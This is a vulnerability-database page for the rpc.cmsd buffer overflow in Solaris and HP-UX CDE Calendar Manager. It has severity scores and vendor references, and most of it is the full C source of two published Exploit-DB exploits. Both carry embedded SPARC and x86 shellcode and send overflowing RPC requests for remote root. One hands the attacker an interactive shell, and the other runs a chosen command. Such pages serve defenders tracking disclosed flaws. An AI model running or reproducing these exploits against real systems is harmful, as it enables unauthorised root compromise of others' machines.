Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Buffer overflow in CDE Calendar Manager Service Daemon (rpc.cmsd).
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 10 | AV:N/AC:L/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 19420
Publication date : 1999-07-12 22h00 +00:00
Author : Last Stage of Delirium
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*## copyright LAST STAGE OF DELIRIUM jul 1999 poland *://lsd-pl.net/ #*/
/*## rpc.cmsd #*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
#define ADRNUM 1500
#define NOPNUM 1600
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PING 0
#define CMSD_CREATE 21
#define CMSD_INSERT 6
char findsckcode[]=
"\x20\xbf\xff\xff" /* bn,a <findsckcode-4> */
"\x20\xbf\xff\xff" /* bn,a <findsckcode> */
"\x7f\xff\xff\xff" /* call <findsckcode+4> */
"\xa0\x20\x3f\xff" /* sub %g0,-1,%l0 */
"\xa4\x03\xff\xd0" /* add %o7,-48,%l2 */
"\xa6\x10\x20\x44" /* mov 0x44,%l3 */
"\xa8\x10\x23\xff" /* mov 0x3ff,%l4 */
"\xaa\x03\xe0\x44" /* add %o7,68,%l5 */
"\x81\xc5\x60\x08" /* jmp %l5+8 */
"\xaa\x10\x20\xff" /* mov 0xff,%l5 */
"\xab\x2d\x60\x08" /* sll %l5,8,%l5 */
"\xaa\x15\x60\xff" /* or %l5,0xff,%l5 */
"\xe2\x03\xff\xd0" /* ld [%o7-48],%l1 */
"\xac\x0c\x40\x15" /* and %l1,%l5,%l6 */
"\x2b\x00\x00\x00" /* sethi %hi(0x00000000),%l5 */
"\xaa\x15\x60\x00" /* or %l5,0x000,%l5 */
"\xac\x05\x40\x16" /* add %l5,%l6,%l6 */
"\xac\x05\xbf\xff" /* add %l6,-1,%l6 */
"\x80\xa5\xbf\xff" /* cmp %l6,-1 */
"\x02\xbf\xff\xf5" /* be <findsckcode+32> */
"\xaa\x03\xe0\x7c" /* add %o7,0x7c,%l5 */
"\xe6\x23\xff\xc4" /* st %l3,[%o7-60] */
"\xc0\x23\xff\xc8" /* st %g0,[%o7-56] */
"\xe4\x23\xff\xcc" /* st %l2,[%o7-52] */
"\x90\x04\x3f\xff" /* add %l0,-1,%o0 */
"\xaa\x10\x20\x54" /* mov 0x54,%l5 */
"\xad\x2d\x60\x08" /* sll %l5,8,%l6 */
"\x92\x15\xa0\x91" /* or %l6,0x91,%o1 */
"\x94\x03\xff\xc4" /* add %o7,-60,%o2 */
"\x82\x10\x20\x36" /* mov 0x36,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\xa0\x24\x3f\xff" /* sub %l0,-1,%l0 */
"\x1a\xbf\xff\xe9" /* bcc <findsckcode+36> */
"\x80\xa4\x23\xff" /* cmp %l0,0x3ff */
"\x04\xbf\xff\xf3" /* bl <findsckcode+84> */
"\xaa\x20\x3f\xff" /* sub %g0,-1,%l5 */
"\x90\x05\x7f\xff" /* add %l5,-1,%o0 */
"\x82\x10\x20\x06" /* mov 0x6,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x90\x04\x3f\xfe" /* add %l0,-2,%o0 */
"\x82\x10\x20\x29" /* mov 0x29,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\xaa\x25\x7f\xff" /* sub %l5,-1,%l5 */
"\x80\xa5\x60\x03" /* cmp %l5,3 */
"\x04\xbf\xff\xf8" /* ble <findsckcode+144> */
"\x80\x1c\x40\x11" /* xor %l1,%l1,%g0 */
;
char setuidcode[]=
"\x90\x08\x3f\xff" /* and %g0,-1,%o0 */
"\x82\x10\x20\x17" /* mov 0x17,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
;
char shellcode[]=
"\x20\xbf\xff\xff" /* bn,a <shellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <shellcode> */
"\x7f\xff\xff\xff" /* call <shellcode+4> */
"\x90\x03\xe0\x24" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\x98\x03\xe0\x24" /* add %o7,32,%o4 */
"\xc0\x23\x20\x08" /* st %g0,[%o4+8] */
"\xd0\x23\x20\x10" /* st %o0,[%o4+16] */
"\xc0\x23\x20\x14" /* st %g0,[%o4+20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh"
;
char cmdshellcode[]=
"\x20\xbf\xff\xff" /* bn,a <cmdshellcode-4> */
"\x20\xbf\xff\xff" /* bn,a <cmdshellcode> */
"\x7f\xff\xff\xff" /* call <cmdshellcode+4> */
"\x90\x03\xe0\x34" /* add %o7,52,%o0 */
"\x92\x23\xe0\x20" /* sub %o7,32,%o1 */
"\xa2\x02\x20\x0c" /* add %o0,12,%l1 */
"\xa4\x02\x20\x10" /* add %o0,16,%l2 */
"\xc0\x2a\x20\x08" /* stb %g0,[%o0+8] */
"\xc0\x2a\x20\x0e" /* stb %g0,[%o0+14] */
"\xd0\x23\xff\xe0" /* st %o0,[%o7-32] */
"\xe2\x23\xff\xe4" /* st %l1,[%o7-28] */
"\xe4\x23\xff\xe8" /* st %l2,[%o7-24] */
"\xc0\x23\xff\xec" /* st %g0,[%o7-20] */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh -c "
;
static char nop[]="\x80\x1c\x40\x11";
typedef struct{char *target,*new_target;}req1_t;
typedef struct{
struct{long tick,key;}appt_id;
void *tag;
int duration,ntimes;
char *what;
struct{int period,nth;long enddate;}period;
char *author,*client_data;
void *exception,*attr;
int appt_status,privacy;
void *next;
}appt_t;
typedef struct{
char *target;
struct{
int tag;
union{struct{void *v1,*v2;int i;}apptid;appt_t *appt;}args_u;
}args;
int pid;
}req2_t;
bool_t xdr_req1(XDR *xdrs,req1_t *obj){
if(!xdr_string(xdrs,&obj->target,~0)) return(FALSE);
if(!xdr_string(xdrs,&obj->new_target,~0)) return(FALSE);
}
bool_t xdr_appt(XDR *xdrs,appt_t *objp){
char *v=NULL;long l=0;int i=0;
if(!xdr_long(xdrs,&l)) return(FALSE);
if(!xdr_long(xdrs,&l)) return(FALSE);
if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
if(!xdr_int(xdrs,&i)) return(FALSE);
if(!xdr_int(xdrs,&objp->ntimes)) return(FALSE);
if(!xdr_string(xdrs,&objp->what,~0)) return(FALSE);
if(!xdr_int(xdrs,&objp->period.period)) return(FALSE);
if(!xdr_int(xdrs,&i)) return(FALSE);
if(!xdr_long(xdrs,&l)) return(FALSE);
if(!xdr_string(xdrs,&objp->author,~0)) return(FALSE);
if(!xdr_string(xdrs,&objp->client_data,~0)) return(FALSE);
if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
if(!xdr_int(xdrs,&i)) return(FALSE);
if(!xdr_int(xdrs,&i)) return(FALSE);
if(!xdr_pointer(xdrs,&v,0,(xdrproc_t)NULL)) return(FALSE);
return(TRUE);
}
bool_t xdr_req2(XDR *xdrs,req2_t *obj){
if(!xdr_string(xdrs,&obj->target,~0)) return(FALSE);
if(!xdr_int(xdrs,&obj->args.tag)) return(FALSE);
if(!xdr_pointer(xdrs,(char**)&obj->args.args_u.appt,sizeof(appt_t),
xdr_appt)) return(FALSE);
if(!xdr_int(xdrs,&obj->pid)) return(FALSE);
return(TRUE);
}
main(int argc,char **argv){
char buffer[30000],address[4],*b,*cmd;
int i,c,n,flag=0,vers=7,port=0,sck;
CLIENT *cl;enum clnt_stat stat;
struct hostent *hp;
struct sockaddr_in adr;
struct timeval tm={10,0};
req1_t req1;req2_t req2;appt_t ap;
char calendar[32];
printf("copyright LAST STAGE OF DELIRIUM jul 1999 poland //lsd-pl.net/\n");
printf("rpc.cmsd for solaris 2.5 2.5.1 2.6 2.7 sparc\n\n");
if(argc<2){
printf("usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]\n",
argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"tsc:p:v:"))!=-1){
switch(c){
case 't': flag|=4;break;
case 's': flag|=2;break;
case 'c': flag|=1;cmd=optarg;break;
case 'p': port=atoi(optarg);break;
case 'v': vers=atoi(optarg);
}
}
if(vers==5) *(unsigned long*)address=htonl(0xefffcf48+600);
if(vers==6) *(unsigned long*)address=htonl(0xefffed0c+100);
if(vers==7) *(unsigned long*)address=htonl(0xffbeea8c+600);
printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
fflush(stdout);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("\nerror");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}else{
if((hp=gethostbyaddr((char*)&adr.sin_addr.s_addr,4,AF_INET))==NULL){
errno=EADDRNOTAVAIL;perror("\nerror");exit(-1);
}
}
if((b=(char*)strchr(hp->h_name,'.'))!=NULL) *b=0;
if(flag&4){
sck=RPC_ANYSOCK;
if(!(cl=clntudp_create(&adr,CMSD_PROG,CMSD_VERS,tm,&sck))){
clnt_pcreateerror("\nerror");exit(-1);
}
stat=clnt_call(cl,CMSD_PING,xdr_void,NULL,xdr_void,NULL,tm);
if(stat!=RPC_SUCCESS) {clnt_perror(cl,"\nerror");exit(-1);}
clnt_destroy(cl);
if(flag==4) {printf("sent!\n");exit(0);}
}
adr.sin_port=htons(port);
sck=RPC_ANYSOCK;
if(!(cl=clnttcp_create(&adr,CMSD_PROG,CMSD_VERS,&sck,0,0))){
clnt_pcreateerror("\nerror");exit(-1);
}
cl->cl_auth=authunix_create(hp->h_name,0,0,0,NULL);
sprintf(calendar,"xxx.XXXXXX");
req1.target=mktemp(calendar);
req1.new_target="";
stat=clnt_call(cl,CMSD_CREATE,xdr_req1,&req1,xdr_void,NULL,tm);
if(stat!=RPC_SUCCESS) {clnt_perror(cl,"\nerror");exit(-1);}
b=buffer;
for(i=0;i<ADRNUM;i++) *b++=address[i%4];
*b=0;
b=&buffer[2000];
for(i=0;i<2;i++) *b++=0xff;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
if(flag&2){
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct{unsigned int maxlen;unsigned int len;char *buf;}nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=-ntohs(adr.sin_port);
printf("port=%d connected! ",-n);fflush(stdout);
*((unsigned long*)(&findsckcode[56]))|=htonl((n>>10)&0x3fffff);
*((unsigned long*)(&findsckcode[60]))|=htonl(n&0x3ff);
for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
}else{
for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
for(i=0;i<strlen(cmdshellcode);i++) *b++=cmdshellcode[i];
for(i=0;i<strlen(cmd);i++) *b++=cmd[i];
*b++=';';
for(i=0;i<3+4-((strlen(cmd)%4));i++) *b++=0xff;
}
*b=0;
ap.client_data=buffer;
ap.what=&buffer[2000];
ap.author="";
ap.ntimes=1;
ap.period.period=1;
req2.target=calendar;
req2.args.tag=3;
req2.args.args_u.appt=≈
stat=clnt_call(cl,CMSD_INSERT,xdr_req2,&req2,xdr_void,NULL,tm);
if(stat==RPC_SUCCESS) {printf("\nerror: not vulnerable\n");exit(-1);}
printf("sent!\n");if(flag&1) exit(0);
write(sck,"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
Exploit Database EDB-ID : 19421
Publication date : 1999-07-12 22h00 +00:00
Author : jGgM
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*
* Unixware 7.x rpc.cmsd exploit by jGgM
* http://www.netemperor.com/en/
* EMail: [email protected]
*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <rpc/rpc.h>
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PROC 21
#define BUFFER_SIZE 1036
#define SHELL_START 1024
#define RET_LENGTH 12
#define ADJUST 100
#define NOP 0x90
#define LEN 68
char shell[] =
/* 0 */ "\xeb\x3d" /* jmp springboard [2000]*/
/* syscall: [2000]*/
/* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 [2000]*/
/* 9 */ "\xc3" /* ret [2000]*/
/* start: [2000]*/
/* 10 */ "\x5e" /* popl %esi [2000]*/
/* 11 */ "\x31\xc0" /* xor %eax,%eax [2000]*/
/* 13 */ "\x89\x46\xbf" /* movl %eax,-0x41(%esi) */
/* 16 */ "\x88\x46\xc4" /* movb %al,-0x3c(%esi) */
/* 19 */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */
/* 22 */ "\x88\x46\x17" /* movb %al,0x17(%esi) */
/* 25 */ "\x88\x46\x1a" /* movb %al,0x1a(%esi) */
/* 28 */ "\x88\x46\xff" /* movb %al,0x??(%esi) */
/* execve: [2000]*/
/* 31 */ "\x31\xc0" /* xor %eax,%eax [2000]*/
/* 33 */ "\x50" /* pushl %eax [2000]*/
/* 34 */ "\x56" /* pushl %esi [2000]*/
/* 35 */ "\x8d\x5e\x10" /* leal 0x10(%esi),%ebx */
/* 38 */ "\x89\x1e" /* movl %ebx,(%esi)[2000]*/
/* 40 */ "\x53" /* pushl %ebx [2000]*/
/* 41 */ "\x8d\x5e\x18" /* leal 0x18(%esi),%ebx */
/* 44 */ "\x89\x5e\x04" /* movl %ebx,0x4(%esi) */
/* 47 */ "\x8d\x5e\x1b" /* leal 0x1b(%esi),%ebx */
/* 50 */ "\x89\x5e\x08" /* movl %ebx,0x8(%esi) */
/* 53 */ "\xb0\x3b" /* movb $0x3b,%al [2000]*/
/* 55 */ "\xe8\xc6\xff\xff\xff" /* call syscall [2000]*/
/* 60 */ "\x83\xc4\x0c" /* addl $0xc,%esp [2000]*/
/* springboard: [2000]*/
/* 63 */ "\xe8\xc6\xff\xff\xff" /* call start [2000]*/
/* data: [2000]*/
/* 68 */ "\xff\xff\xff\xff" /* DATA [2000]*/
/* 72 */ "\xff\xff\xff\xff" /* DATA [2000]*/
/* 76 */ "\xff\xff\xff\xff" /* DATA [2000]*/
/* 80 */ "\xff\xff\xff\xff" /* DATA [2000]*/
/* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA [2000]*/
/* 92 */ "\x2d\x63\xff"; /* DATA [2000]*/
struct cm_send {
char *s1;
char *s2;
};
struct cm_reply {
int i;
};
bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp)
{
if(!xdr_wrapstring(xdrs, &objp->s1))
return (FALSE);
if(!xdr_wrapstring(xdrs, &objp->s2))
return (FALSE);
return (TRUE);
}
bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp)
{
if(!xdr_int(xdrs, &objp->i))
return (FALSE);
return (TRUE);
}
long get_ret() {
return 0x8047720;
}
int
main(int argc, char *argv[])
{
char buffer[BUFFER_SIZE + 1];
long ret, offset;
int len, x, y;
char *command, *hostname;
CLIENT *cl;
struct cm_send send;
struct cm_reply reply;
struct timeval tm = { 10, 0 };
enum clnt_stat stat;
if(argc < 3 || argc > 4) {
printf("Usage: %s [hostname] [command] [offset]\n", argv[0]);
exit(1);
} // end of if..
hostname = argv[1];
command = argv[2];
if(argc == 4) offset = atol(argv[3]);
else offset=0;
len = strlen(command);
len++;
len = -len;
shell[LEN+0] = (len >> 0) & 0xff;
shell[LEN+1] = (len >> 8) & 0xff;
shell[LEN+2] = (len >> 16) & 0xff;
shell[LEN+3] = (len >> 24) & 0xff;
shell[30] = (char)(strlen(command) + 27);
ret = get_ret() + offset;
for(x=0; x<BUFFER_SIZE; x++) buffer[x] = NOP;
x = BUFFER_SIZE - RET_LENGTH - strlen(shell) - strlen(command) - 1 - ADJUST;
for(y=0; y<strlen(shell); y++)
buffer[x++] = shell[y];
for(y=0; y<strlen(command); y++)
buffer[x++] = command[y];
buffer[x] = '\xff';
x = SHELL_START;
for(y=0; y<(RET_LENGTH/4); y++, x=x+4)
*((int *)&buffer[x]) = ret;
buffer[x] = 0x00;
printf("host = %s\n", hostname);
printf("command = '%s'\n", command);
printf("ret address = 0x%x\n", ret);
printf("buffer size = %d\n", strlen(buffer));
send.s1 = buffer;
send.s2 = "";
cl = clnt_create(hostname, CMSD_PROG, CMSD_VERS, "udp");
if(cl == NULL) {
clnt_pcreateerror("clnt_create");
printf("exploit failed; unable to contact RPC server\n");
exit(1);
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
stat = clnt_call(cl, CMSD_PROC, xdr_cm_send, (caddr_t) &send,
xdr_cm_reply, (caddr_t) &reply, tm);
if(stat == RPC_SUCCESS) {
printf("exploit is failed!!\n");
clnt_destroy(cl);
exit(1);
} else {
printf("Maybe, exploit is success!!\n");
clnt_destroy(cl);
exit(0);
}
}
Products Mentioned
Configuraton 0
Hp>>Hp-ux >> Version 10.24
- Hp>>Hp-ux >> Version 10.24 (Open CPE detail)
Hp>>Hp-ux >> Version 11.00
- Hp>>Hp-ux >> Version 11.00 (Open CPE detail)
Sun>>Solaris >> Version 2.5
Sun>>Solaris >> Version 2.6
- Sun>>Solaris >> Version 2.6 (Open CPE detail)
- Sun>>Solaris >> Version 2.6 (Open CPE detail)
- Sun>>Solaris >> Version 2.6 (Open CPE detail)
- Sun>>Solaris >> Version 2.6 (Open CPE detail)
- Sun>>Solaris >> Version 2.6 (Open CPE detail)
Sun>>Sunos >> Version 4.1.3
- Sun>>Sunos >> Version 4.1.3 (Open CPE detail)
Sun>>Sunos >> Version 5.3
- Sun>>Sunos >> Version 5.3 (Open CPE detail)
Sun>>Sunos >> Version 5.4
- Sun>>Sunos >> Version 5.4 (Open CPE detail)
Sun>>Sunos >> Version 5.5
- Sun>>Sunos >> Version 5.5 (Open CPE detail)
Sun>>Sunos >> Version 5.5.1
- Sun>>Sunos >> Version 5.5.1 (Open CPE detail)
References
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/188
Tags : vendor-advisory, x_refsource_SUN
Tags : vendor-advisory, x_refsource_SUN
http://www.ciac.org/ciac/bulletins/j-051.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9908-102
Tags : vendor-advisory, x_refsource_HP
Tags : vendor-advisory, x_refsource_HP
2025©
tesweb SA
